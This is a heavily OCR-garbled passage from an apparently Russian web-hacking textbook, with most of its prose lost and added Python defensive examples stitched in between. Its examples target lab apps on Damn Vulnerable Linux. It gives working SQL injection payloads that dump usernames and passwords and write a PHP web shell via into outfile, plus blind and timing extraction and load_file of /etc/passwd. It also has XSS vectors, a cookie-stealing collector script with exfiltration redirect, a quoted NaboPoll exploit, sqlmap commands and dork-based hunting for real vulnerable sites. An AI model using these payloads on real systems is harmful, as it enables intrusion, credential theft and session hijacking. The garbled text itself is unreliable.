New message in forum "root:x:0:0::/root:/bin/bash bin:x:1:1:bin:/bin: daemon:x:2:2:daemon:/sbin: adm:x:3:4:adm:/var/log: lp:x:4:7:lp:/var/spool/lpd: sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/: news:x:9:13:news:/usr/lib/news: uucp:x:10:14:uucp:/var/spool/uucppublic: operator:x:11:0:operator:/root:/bin/bash games:x:12:100:games:/usr/games: ftp:x:14:50::/home/ftp: smmsp:x:25:25:smmsp:/var/spool/clientmqueue: mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash rpc:x:32:32:RPC portmap user:/:/bin/false sshd:x:33:33:sshd:/: gdm:x:42:42:GDM:/var/state/gdm:/bin/bash pop:x:90:90:POP:/: nobody:x:99:99:nobody:/: postgres:x:1000:100::/home/postgres:"
Line breaks are processed, you don't need to force them through <BR>. HTML tags will be filtered! Links will automatically be generated.

Fig. 05.7. /etc/passwd load_file

2 SQL- show.
php, 4 SQL-
.
.
,
SQL-:
param=1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14

,
SQL- , 1. ,
.
, SQL-
:
param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user ,1

,
, (-- /*),
. ? LIMIT,

.
:

param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user LIMIT 0,1

SQL :

param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user LIMIT 0,1
.
1 ( ), WHERE:

param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user WHERE 1
:

param=1+union+select+1,2,concat(user_name,0x25,password,0x25,email),4,5,6,7,8,9,10,11,12,13,14,15 from p_user WHERE 1=1
WHERE 1=1 SQL ( 1 = 1)
,
.
, id=31,
(-, +, * /),
(, 1 0).
,
(/* --).
,
( SQL).


select ... into outfile ,
-.
/usr/local/apache/htdocs/ chmod 777 cyphor.
cyphor. ,
. nobody,
Apache, ,
. ,
, images include.
. select ... into outfile
, SELECT, .
SQL- newmsg.php.

Cyphor user , txt ''

:
select 1,concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/user.txt'

:
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 1,concat_ws(0x3a,nick,password),3,4 from cyphor_users into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/user.txt'

, ,
http://localhost/webexploitation_package_02/cyphor/user.txt,
(Fig. 05.8).
admin .
Location: http://localhost/webexploitation_package_02/cyphor/user.txt

admin:ad4ERM.YJ7j9A
...

Retrieving 26 from localhost...

Fig. 05.8. Cyphor

, . , i i/
, ( I )
4 , ( k o i
,
2). i </,
, .

-
, outfile
-.
hex. . :
union select 1,2,3,4 :
hex("<pre><? system($_GET['cmd']); ?></pre>")

Fig. 05.9 ,
.

Location: http://localhost/webexploitation_package_02/cyphor/newmsg.php?fid=-1%20union%20select%201,hex(...),3,4 ...

Not logged in!
New message in forum "3C7072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E"
Line breaks are processed, you don't need to force them through <BR>. HTML tags will be filtered! Links will automatically be generated.

Fig. 05.9. hex

( ) ,
,
( ).
( ):
http://localhost/webexploitation_package_02/cyphor/showmsg.php?fid=-1 union select 0x3C7072653E3C3F2073797374656D28245F4745545B27636D64275D293B3F3E3C2F7072653E,null,null,null into outfile '/usr/local/apache/htdocs/webexploitation_package_02/cyphor/shell.php'

-
shell.php, ,
, :
http://localhost/webexploitation_package_02/cyphor/shell.php?cmd=ls+-la

. 05.10.
,
, , S Q L . ,
.
S Q L -? .

D V L - ( :
--- sql in je ctio n ).
, .
.
(, ComicShout v.2).

Location: http://localhost/webexploitation_package_02/cyphor/shell.php?cmd=ls+-la

total 74
drwxrwxrwx  9 root root  100 May 22 16:36 .
drwxr-xr-x 19 root root  366 Jan 18  2009 ..
drwxr-xr-x  2 root root  281 Jan 18  2009 admin
-rw-r--r--  1 root root 3617 Jan 18  2009 cyphor.css
drwxr-xr-x  2 root root   69 Jan 18  2009 doc
Page loaded.

Fig. 05.10. -

SQL-
, , , S Q L -.
, show.php
Cyphor. :
$message_mode = 1;
:
$id = intval($id);
if (!$id)
{
    die("<br><h1>Hacking attempt!</h1>");
}


, i d,
, . ,
.
. 05.11.
, fid,
.
, ,
. :
$text_to_check = mysql_real_escape_string($_GET["запрос"]);
$text_to_check = strip_tags($text_to_check);
$text_to_check = htmlspecialchars($text_to_check);
$text_to_check = stripslashes($text_to_check);
$text_to_check = addslashes($text_to_check);
$_GET["запрос"] = $text_to_check;

Location: http://localhost/webexploitation_package_02/cyphor/show.php?...order,8,id,10%20from%20cyphor_users%20where%20...

Hacking attempt!
Page loaded.

Fig. 05.11. show.php

SQ L
select, union, order, char, where, from.

,
, .
(, ):
ini_set('display_errors', 0);

.
. ,
, , ,
SQL-. 5:
$section = $_GET['section'];
$result = mysql_query("SELECT * FROM `tbl_name` WHERE `section` = '$section'");
if (!$result || mysql_num_rows($result) == 0) {
    // ...
    header("Location: http://{$_SERVER['HTTP_HOST']}/...");
    exit();
} else {
    // ...
}


(wo
, '' ftjp ,
^, \ ),
, \ >
.
(CMS), \>
,
'' , ( (
shell,
, SQL , ,
,
.


. ,
:
http://www.site.net/module.php?id=-1 union select ...,user(),... --

ERROR 1267 : Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
, , ,
latin1, swedish, , user(),
utf8_general. MySQL ,
, UNION .
, user()
convert ;
convert(user() using latin1)
:
http://www.site.net/module.php?id=-1 union select 1,2,convert(user() using latin1),4 --
.
SQL
MySQL, SQL MS SQL,
5,

(Cross-Site Scripting, XSS)


,
- .
XSS, CSS,
, , CSS
(Cascade Style Sheets),
. X XSS
, (- cross), , , ,
.
XSS HTM L/
JavaScript/VBScript- ,
.
,
, .
: .
.
,
,
. XSS,
.

XSS
cookie-
.
cookie ( )?
, .
cookie-


, > </ {/ &


cookie :!, ,

, <*"
%
.
1
0) &
Hacked by V .Pupkin. 1 %$$< I 1
, ( ' ;).
(,&0
JavaScript VBScript, / , //
- * . ( 1&&1, WM, 0
, . , '
XSS , 'iWOf 11 ; (>\'
,


'
, -
XSS, , XSS ^
, - /, ( ~
. ^ -
, , 11 %'SMi &

, !.
.
, , ,
search, . 11
,
:
script.php?search=[...]
, html
, :
script.php?search=<b>Hacked</b>
,
, Hacked.
, <marquee> </marquee>,
, <h1> </h1>, /
. ,
. .
, ,,


- - .
<b>Hacked</b> cookie (
). , ,
,
( , %3 ):
script.php?search=%3cmarquee%3eHacked%3c/marquee%3e

,
GET:
script.php?search=<b>Hacked</b>

,
POST, . html, P O S T .
, javascript-,

.



html-. ,
XSS-. ,
, html-,
. XSS-
.

. ,
, .
,
, ( ) .

( ).
, ,
html-, html, ,
.
, :
<script>alert('Hacked by Vasya!')</script>. XSS

Hacked by
Vasya!


X S S - ; ,
, ,
, , .

-,
XSS
-. XSS.
name.php :
<?php
$name = $_GET['name'];
echo "Your name is $name";
?>

/usr/local/apache/htdocs.
form.html :
<form action="name.php" method="GET">
<input type="text" name="name">
<input type="submit" value="OK">
</form>


() name. php.
http://localhost/form.html (. 06.1), (, Vasya)
.
Location: http://localhost/form.html
(a text field and an OK button)
Page loaded.

Fig. 06.1. form.html

name.php , . 06.2.
, form.html
<h1>Hacked<h1>, Hacked,
. 06.3.

Location: http://localhost/name.php?name=Vasya

Your name is Vasya
Page loaded.

Fig. 06.2. name.php

Location: http://localhost/name.php?name=%3Ch1%3EHacked%3Ch1%3E

Your name is
Hacked (rendered as an <h1> heading)
Page loaded.

Fig. 06.3. name.php html

, html- ( <h1> </h1>,


) ,
-, name.php.
:
JavaScript. form, html
<script>alert('Hacked by Vasya')</script>

<script> </script> (),


alert() .
, , , ,
. 06.4.
( Location)
, ,
( ).
, - . (
,

.

Location: http://localhost/name.php?name=%3Cscript%3Ealert(...)%3C%2Fscript%3E

Your name is
(alert box) Hacked by Vasya
localhost contacted. Waiting for reply.

Fig. 06.4.

.)
cookie-.
cookie,
<script>alert(document.cookie)</script>

Damn Vulnerable Linux ,


cookie, - . 06.5.

. 06.5. cookie

, , cookie-
, .
javascript-,
cookie- - (
-), , ,
. -,
- cookie.
( D V L ),
.
<?
$query = $_SERVER['QUERY_STRING']; //
// cookie, JavaScript
$query .= "\n";
//
$db = "/tmp/cookies.txt";
// ,
// cookie
$fh = fopen($db, "a+");   // append mode (the scan is unreadable here; "a+" assumed)
// ,
fputs($fh, "$query");
fclose($fh);
//
// ( cookie )
// cookie
// .
?>

php- cookie-
c o o k 1 e s .t x t .
, .
/usr/local/apache/htdocs steal.php. Cookie-
/tmp,
, /usr/local/apache/htdocs nobody,
-, .
, nobody.
javascript- :
<script>document.location.replace('http://___/___.php?com='+document.cookie);</script>

document.location.replace

cookie-

'http://___/___.php

?com='+document.cookie
cookie-, ,
? ( QUERY_STRING),
cookie-, ,
-. cookie
, .

cookie- -
cookies. txt.
form.html :
<script>
document.location.replace('http://localhost/steal.php?com='+document.cookie);
</script>

OK ,
steal.php. /tmp
cat cookies.txt cookies.txt cookie-
(. 06.6).

base64, .
. .
, ,
- . .

bt tmp # cat cookies.txt
com=7f135c19da497d54931966ae886c03ce9=09d61c9bde3022587576058253fcac25;%20PHPSESSID=3efd3bca772a907bceacdc56de...;%20phpbb2mysql_sid=4e715bd0fad50440f0a1e5bbeee3fb25;%20phpbb2mysql_data=a%3A0%3A%7B%7D
bt tmp #

Fig. 06.6. cookies

, cookies .txt
cookie- . (,
- 15-, 03,
, ).
cookie- , 1 ( Internet
Explorer), Opera Firefox.
,
, .
( ),
, (
, html-).

. , , ,
, , , , , .

, ,
( , )
. ,
, ,
() ,
( ). - !

... ,
, html- .
, -
,
.
XSS html- .
:

<script>
function ShowPage(){
    // page <html>
    var page=document.getElementById("html");
    // CodeOfPage
    var CodeOfPage=page.innerHTML;
    // alert()
    alert(CodeOfPage);
}
</script>
, ,

/ / , .


<script>
, <script> ?
<script> .
, , X S S . , javascript (
vbscript).
(alert),
.
, ,
:

, ;

, Internet Explorer.

, .

<META>. ,
. <META> refresh, CONTENT
:
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

<BODY>. :
<BODY BACKGROUND="javascript:alert('XSS')">
OnLoad, .
javascript- :
<BODY ONLOAD=alert('XSS')>

<IMG>. SRC:
<IMG SRC=javascript:alert('XSS')>
, javascript ?
:
<IMG SRC="javascript:alert('XSS')">

.
:
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC="
javascript:alert('XSS');">
VBScript:
<IMG SRC='vbscript:msgbox("XSS")'>

<STYLE>. IE , ,
:
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
, Internet
Explorer.

<TABLE>. .
BACKGROUND, . ,
javascript-:
<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV>. . ,
<div> </div>, .
:
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
, url() expression():
<DIV STYLE="width: expression(alert('XSS'));">

<STYLE>. ,
<STYLE> </STYLE>. :
<STYLE>.XSS{background-image:url("javascript:alert('Hacked')");}</STYLE><A CLASS=XSS></A>
XSS ( XSS-),
<A CLASS=XSS></A>
:
<STYLE type="text/css">BODY{background:url("javascript:alert('Hacked')")}</STYLE>
XSS-
.

<BGSOUND>. ,
javascript-:
<BGSOUND SRC="javascript:alert('XSS');">

<IMG>. .
, Internet
Explorer. DYNSRC LOWSRC.
:
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
SRC ,
,
<OBJECT> html-.
javascript- :
<OBJECT TYPE="text/x-scriptlet" DATA="http://www.site.com/test.html"></OBJECT>


, .
.
.
.
, XSS .
XSS :

javascript- ;

VBScript-;

(
);

XSS- <IMG> Firefox.
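The defensive side of this chapter, as an added example that is not from the book: output encoding for the text context of name.php (so <h1> or <script> arrive as text), and scheme validation for URL-bearing attributes and inline styles, which is what defeats the javascript:/vbscript: vectors above, including the mixed-case, newline-padded and CSS url()/expression() variants. All function names are this example's own.

```python
"""HTML output encoding and URL/style validation against the reflected XSS
vectors listed above (added example, not from the book)."""
import html
import re
from urllib.parse import urlsplit

# Control characters and whitespace that browsers tolerate inside a scheme;
# the '<IMG SRC="\njavascript:..."' variant relies on exactly this.
_CTRL_WS_RE = re.compile(r"[\x00-\x20]")
# First token inside url( ... ) in an inline style, quotes optional.
_STYLE_URL_RE = re.compile(r"url\(\s*['\"]?\s*([^'\")\s]*)", re.IGNORECASE)


def render_greeting(name: str) -> str:
    """The safe form of name.php's echo: the value is HTML-escaped, so
    markup and script tags are shown literally instead of being parsed."""
    return "Your name is " + html.escape(name, quote=True)


def is_safe_link(value: str) -> bool:
    """Accept http(s) and same-site relative URLs for src/href/background
    attributes; reject javascript:, vbscript:, data: and any scheme hidden
    behind control characters or mixed case."""
    cleaned = _CTRL_WS_RE.sub("", value)
    scheme = urlsplit(cleaned).scheme.lower()
    if scheme == "":
        return not cleaned.startswith("//")   # protocol-relative = off-site
    return scheme in ("http", "https")


def style_has_active_content(style: str) -> bool:
    """True if an inline style could run script: IE's expression() or a
    url() whose target is not a plain http(s)/relative URL."""
    s = _CTRL_WS_RE.sub("", style)
    if "expression(" in s.lower():
        return True
    return any(not is_safe_link(u) for u in _STYLE_URL_RE.findall(s))


if __name__ == "__main__":
    print(render_greeting("<script>alert('Hacked by Vasya')</script>"))
    for link in ("javascript:alert('XSS')", "\njavascript:alert('XSS');", "/images/logo.gif"):
        print(repr(link), is_safe_link(link))
```

Escaping is context-specific: html.escape is right between tags and inside quoted attributes, but a value that ends up inside a URL, a style or a script block needs the corresponding validation or encoding instead, which is why the link and style checks are separate functions.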

SQ L-

SQL MySQL,
MS SQL, . .
, , 11
, ,
SELECT UNION,
.
, * M ySQ L,
. ,
.
( -- /*),
,
. , INSERT
(. ), ,
. (.'
, , ,
. ,
,
.
, , ,
.
:

http://site.com/news.php?id=12

,
,
, :

news.php?id=12 and 1=1
, .
:

news.php?id=12 and 1=2


, .
, , ,
, ,
,
, .
, :

mysql.user

news.php?id=12 and 1=1

news.php?id=12 and 1=2

.
, ,
! 1=2, ,

1=1.

.
, ( 1=1),
( 1=2). ,
, , , ,
, .
, .

MySQL
@@version
MySQL .
, MySQL .
:
news.php?id=12 and substring(@@version,1)=4
@@version
(=4). , ,
, 1=2.
, 4 5 .
, , MySQL 5.
4 5 , 3. , MySQL 3 ,
- ,
SELECT

UNION .

@@version version().


mysql.user
, ,
. select *
news.php?id=12 and (select 1)=1

, .
, '
, mysql.user:
news.php?id=12 and (SELECT 1 from mysql.user limit 0,1)=1

mysql.user, ,
, . ,
, , mysql.user, !
MySQL load_file()
OUTFILE. , *
limit 0,1,
;
.
limit.


MySQL 5,
information_schema ,
.
,
users:
news.php?id=12 and (SELECT 1 from users limit 0,1)=1

users, .
, .
MySQL 4,
.



- ,
. , users
,
:
news.php?id=12 and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1

password,
substring ( ), ,
1, password .
password, .


/
,
, ,
. SQL-.
(username) (password) users.
, , ! username, password,
email userid.
(username) (password) where:
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>100

limit 0,1.
,
,
. , ,
. , select

substring( ,1,1),
. ascii
ASCII-. > 100.
ASCII- , 100,
.
, , 100
:
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>80

, , 80.
:
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>90

, :
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>85

, :
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),1,1))>86

, , . ,
85, 86, 86! ,
=86. , ASCII - (
char(86)). ,
V. , substring:
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>100
substring ,1,1 ,2,1,
select.
, .
>100 , :
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>120

, 110:
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>110

, :
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>105

:
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>103

. :
news.php?id=12 and ascii(substring((SELECT concat(username,0x3a,password) from users where userid=2),2,1))>104

, , 104 105,
105. char(105) = i.
Vi. ,
. .
. .
( substring) , ,
, >0 . , ,
user/password .
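The character-by-character walk above leaves a very recognisable trail in the web server's logs. The following detection logic is an added example, not from the book: it parses access-log lines, normalises the /**/ and + encodings, and for each source address counts the and 1=1 / and 1=2 tautology pairs (including whether the two produced different response sizes, i.e. a usable oracle) and the ascii(substring(...)) comparisons together with the character positions they probe. The log lines are constructed; all names are this example's own.

```python
"""Spot boolean-based blind SQL injection probing (tautology pairs and
ascii(substring(...)) comparisons) in access-log lines (added example,
not from the book)."""
import re
from collections import defaultdict
from typing import Optional
from urllib.parse import unquote_plus

# Constructed Apache common-log lines: one request per line.
SAMPLE_LOG = """\
10.0.0.5 - - [27/Jun/2010:19:27:41 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120
10.0.0.5 - - [27/Jun/2010:19:27:45 +0000] "GET /news.php?id=12+and+1%3D1 HTTP/1.1" 200 5120
10.0.0.5 - - [27/Jun/2010:19:27:49 +0000] "GET /news.php?id=12+and+1%3D2 HTTP/1.1" 200 318
10.0.0.5 - - [27/Jun/2010:19:28:02 +0000] "GET /news.php?id=12+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+where+userid%3D2),1,1))%3E100 HTTP/1.1" 200 318
10.0.0.5 - - [27/Jun/2010:19:28:05 +0000] "GET /news.php?id=12+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+where+userid%3D2),1,1))%3E80 HTTP/1.1" 200 5120
10.0.0.5 - - [27/Jun/2010:19:28:08 +0000] "GET /news.php?id=12+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+where+userid%3D2),1,1))%3E90 HTTP/1.1" 200 318
10.0.0.5 - - [27/Jun/2010:19:28:11 +0000] "GET /news.php?id=12+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+where+userid%3D2),1,1))%3E85 HTTP/1.1" 200 5120
10.0.0.5 - - [27/Jun/2010:19:28:14 +0000] "GET /news.php?id=12+and+ascii(substring((SELECT+concat(username,0x3a,password)+from+users+where+userid%3D2),1,1))%3E86 HTTP/1.1" 200 318
192.168.1.9 - - [27/Jun/2010:19:30:00 +0000] "GET /news.php?id=7 HTTP/1.1" 200 4890
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)
TAUTOLOGY_RE = re.compile(r"\band\s+(\d+)\s*=\s*(\d+)", re.I)
CHAR_PROBE_RE = re.compile(
    r"ascii\s*\(\s*substring\s*\(.*?\)\s*,\s*(\d+)\s*,\s*1\s*\)\s*\)\s*([<>]=?)\s*(\d+)", re.I
)


def normalise_query(path: str) -> str:
    """URL-decode (+ and %xx) and turn /**/ comments and whitespace runs into spaces."""
    q = unquote_plus(path.partition("?")[2])
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q).strip()


def classify(path: str) -> Optional[str]:
    """'char-probe pos=N op value', 'tautology-true', 'tautology-false' or None."""
    q = normalise_query(path)
    m = CHAR_PROBE_RE.search(q)
    if m:
        return "char-probe pos=%s %s%s" % (m.group(1), m.group(2), m.group(3))
    m = TAUTOLOGY_RE.search(q)
    if m:
        return "tautology-true" if m.group(1) == m.group(2) else "tautology-false"
    return None


def analyse(log_text: str) -> dict:
    """Per source IP: number of probes, probed character positions, and
    whether the true/false requests returned different body sizes."""
    per_ip = defaultdict(lambda: {"probes": 0, "positions": set(), "sizes": {}})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        kind = classify(m.group("path"))
        if kind is None:
            continue
        rec = per_ip[m.group("ip")]
        rec["probes"] += 1
        if kind.startswith("char-probe"):
            rec["positions"].add(int(kind.split("pos=")[1].split()[0]))
        else:
            rec["sizes"][kind] = m.group("size")
    return {
        ip: {"probes": r["probes"], "positions": sorted(r["positions"]),
             "oracle": len(set(r["sizes"].values())) > 1}
        for ip, r in per_ip.items()
    }


if __name__ == "__main__":
    print(analyse(SAMPLE_LOG))
```

A single tautology pair can be a scanner's fingerprinting; the combination of a working size oracle and several char probes from one address within seconds is the extraction phase, and the position set tells you how far it got.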

SQL- NaboPoll
Damn Vulnerable Linux NaboPoll (
), results.php
, S Q L -. :
27...31
$res_question = mysql_query("select * from nabopoll_questions where survey=$survey order by id");
if ($res_question == FALSE || mysql_numrows($res_question) == 0)
    error($row_survey, "questions not found");

$survey () ,
SQL-. ,
where .

,
. http://localhost/webexploitation_package_02/nabopoll/admin/survey_edit.php , Fig. 07.1

Fig. 07.1. NaboPoll (admin page survey_edit.php)


Actions ().
, ( ),
( Actions).
, 1
, Fig. 07.2. (
http://localhost/webexploitation_package_02/nabopoll/result.php?surv=1).
surv=1 :
/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),1,1))>125),1,0)))
SQL-
NaboPoll. .
(/**/), , .
- SELECT AND
1, SELECT IF.
IF (1),
, (0), . ,
, AND 1=1,
( ). ,
AND 1=0, ,
survey not found ( ). IF
: ASCII- MySQL (

(Fig. 07.2: NaboPoll result.php with surv=1 and the injected condition true; the poll answers show 0%(0))

Fig. 07.2. NaboPoll

(Fig. 07.3: the same request with the condition false; the page shows "survey not found")

Fig. 07.3. NaboPoll

, , , 100,
( ).
, , 114. .
( SUBSTRING
2):
/**/AND/**/1=(SELECT/**/(IF((ASCII(SUBSTRING(user(),2,1))>114),1,0)))

, 111
( ).
, http://packetstormsecurity.org/0702-exploits/nabopoll-sql.txt
. , (
<?), , (
, Fig. 07.4). $survey 1,
$path :
/webexploitation_package_02/nabopoll

Location: http://packetstormsecurity.org/0702-exploits/nabopoll-sql.txt

<?
# Nabopoll Blind SQL Injection Exploit
# Download: www.nabocorp.com/nabopoll/
# coded by s0cratex
# Contact: s0cratex#hotmail.com

error_reporting(0);
ini_set("max_execution_time", 0);
// just change the default values...
$srv = "localhost"; $path = "/poll"; $port = 80;
$survey = "8"; // you can verify the number entering in the site and viewing the results.

echo "Nabopoll SQL Injection - Proof of Concept Exploit\n";
echo "MySQL User: ";
... (the character-by-character loop over result.php?surv=... is not legible in the scan)
echo "\n";
?>

Fig. 07.4. NaboPoll
nabopoll.php, , /tmp
php nabopoll.php.

,
MySQL (Fig. 07.5).

bt tmp # php nabopoll.php
Nabopoll SQL Injection - Proof of Concept Exploit
MySQL User: root@localhost

Fig. 07.5. NaboPoll
, , MySQL root@localhost.
, SQL-
: 0 255.
( , ),
.
, , , , ,
. .
,
load_file(), ,
, /etc/passwd.
user() :
load_file(0x2f6574632f706173737764)
Fig. 07.6.
,
,
.
, 100 195 .
,
100 15 , 13 .
6.
MD5 hash,
(
, ,
). 0-9 a-f.
.
-
8.

Fig. 07.6. NaboPoll



site.com
news. php. , sql , 5 .
.
sqlmap,
:
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(username,0x3a,password) from users where userid=2)"
- , , -
, ( id). -
(
user-agent = sqlmap, ). -v1
. 11 --string ,
, . , 1=1
1-2 ,
. - , ,
, SELECT .
sqlmap 5 ,
. sqlmap
(), mysql5,
. -,

( mysql4
):
./sqlmap.py -u "http://site.com/news.php?id=12" -p id -a "./txt/user-agents.txt" -v1 --string "Posted 3-3-2008" -e "(SELECT concat(table_schema,0x3a,table_name,0x3a,column_name) from information_schema.columns where column_name like 0x257061737325 limit 0,1)"
sqlmap ,
magic quotes,
0x257061737325 ( '%pass%',
).
limit, . ,
sqlmap ,
.


, S Q L -,
. ,
: Warning: mysql_num_rows(): supplied argument is not a valid MySQL
result resource in /home/site/public_html/detail.php on line 377,
, . ( ,
, id) id=29 and 1=1,
, id=29 and 1=2,
.
( 29)
,
.
Google, :
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result
resource.
site:fr, site:uk . .
, S Q L - ,
. , ,
select , ,
. ,
.
,
, /etc/passwd:
id=29 and 1=(SELECT/**/(IF((ASCII(SUBSTRING(load_file(0x2f6574632f706173737764),1,1))<=255),1,0)))

( ),
,
.
NaboPoll, (
, 6).
( 9 0 % ),
,
. user(), database(),
version() @@version_compile_os.
, .



, , ,
,
.
, , SELECT,
INSERT ( ) UPDATE ( )
?
, , ,
. MySQL benchmark(),
PostgreSQL pg_sleep(), MS SQL delay().
benchmark()
- .
- ,
. ,
. ,
sql-:
INSERT INTO table VALUES ('aaa', 'bbb', '[sql]', 'xxx');
table aaa , 'bbb', 'sql' ''.
sql ,
sql-. select
( ):
INSERT INTO table VALUES ('aaa', 'bbb', '[' OR 1=if(ascii(lower(substring((select user from mysql.user limit 1),1,1)))>0, benchmark(999999,md5(now())),1), 'hacked')/*]', 'xxx');

if, , ,
benchmark, -1.
select
mysql .user, ,

, ASCII-, 0.
, benchmark
( benchmark 999 999 MD5 hashes
). ,
(/*), hacked.
,
255:
INSERT INTO table VALUES ('aaa', 'bbb', '[' OR 1=if(ascii(lower(substring((select user from mysql.user limit 1),1,1)))>255, benchmark(999999,md5(now())),1), 'hacked')/*]', 'xxx');
,
, .
,
. !
,
, ,
.
benchmark
:
benchmark .
.
.
32- .
.
benchmark ( 999 999)
.
.
benchmark ,
50
.
, .
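Time-based probing of the benchmark()/sleep()/pg_sleep() kind described above is visible from two directions, and the following added example (not from the book) combines them: the delay function in the decoded query string, and a response time far above the baseline when the log carries Apache's %D field (the time taken to serve the request, in microseconds). The log format and lines are constructed; all names are this example's own.

```python
"""Detect time-based blind SQL injection from request logs that carry a
per-request duration (added example, not from the book)."""
import re
import statistics
from typing import Optional
from urllib.parse import unquote_plus

# Constructed lines: ip [ts] "request" status bytes duration_us
SAMPLE_LOG = """\
10.0.0.5 [27/Jun/2010:20:01:00 +0000] "GET /news.php?id=12 HTTP/1.1" 200 5120 19000
10.0.0.5 [27/Jun/2010:20:01:05 +0000] "GET /news.php?id=13 HTTP/1.1" 200 4980 21000
10.0.0.5 [27/Jun/2010:20:01:15 +0000] "GET /news.php?id=12+and+1%3Dif(ascii(lower(substring((select+user+from+mysql.user+limit+1),1,1)))%3E0,benchmark(999999,md5(now())),1) HTTP/1.1" 200 5120 5412000
10.0.0.5 [27/Jun/2010:20:01:30 +0000] "GET /news.php?id=12+and+1%3Dif(ascii(lower(substring((select+user+from+mysql.user+limit+1),1,1)))%3E255,benchmark(999999,md5(now())),1) HTTP/1.1" 200 5120 23000
10.0.0.6 [27/Jun/2010:20:02:00 +0000] "GET /news.php?id=14 HTTP/1.1" 200 5003 18000
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-) (?P<us>\d+)$'
)
# The delay primitives named in the chapter, plus MS SQL's WAITFOR DELAY.
DELAY_RE = re.compile(r"\b(benchmark|sleep|pg_sleep)\s*\(|\b(waitfor\s+delay)\b", re.I)


def normalise(query: str) -> str:
    """URL-decode and collapse /**/ comments and whitespace to single spaces."""
    q = unquote_plus(query)
    q = re.sub(r"/\*.*?\*/", " ", q)
    return re.sub(r"\s+", " ", q).strip()


def delay_function(path: str) -> Optional[str]:
    """Name of the delay primitive found in the query string, or None."""
    m = DELAY_RE.search(normalise(path.partition("?")[2]))
    if not m:
        return None
    return (m.group(1) or m.group(2)).lower()


def find_time_based(log_text: str, factor: int = 10) -> list:
    """One finding per request carrying a delay function.  'slow' is True
    when it took more than factor x the median of the other requests,
    which is what the true branch of the if()/benchmark() oracle looks like."""
    rows = [m for m in map(LOG_RE.match, log_text.splitlines()) if m]
    baseline = [int(m.group("us")) for m in rows if delay_function(m.group("path")) is None]
    median_us = statistics.median(baseline) if baseline else 0
    findings = []
    for m in rows:
        func = delay_function(m.group("path"))
        if func is None:
            continue
        us = int(m.group("us"))
        findings.append({
            "ip": m.group("ip"),
            "function": func,
            "duration_ms": us // 1000,
            "slow": bool(median_us) and us > factor * median_us,
        })
    return findings


if __name__ == "__main__":
    for f in find_time_based(SAMPLE_LOG):
        print(f)
```

The duration signal matters because the delay function can be obfuscated or live in a POST body the access log does not show; a request that takes seconds where the same script normally takes milliseconds deserves a look even without a matching pattern.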

/proc/self/environ
, ( http://site.com ) php-,
.
, /
, Apache , /tmp
. ?
.
/proc/self/environ.
- , . *nix /, //

self ,
.
- //sel f/environ,
. ,
Apache, /proc/self/environ.
user agent ( -).
/proc/self/environ, user-agent, :

PATH=/sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin:/usr/bin:/bin
SERVER_ADMIN=admin@site.com
...
HTTP_USER_AGENT=Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4 HTTP_KEEP_ALIVE=150
user-agent: <?php eval($_GET[cmd]); ?>
curl:

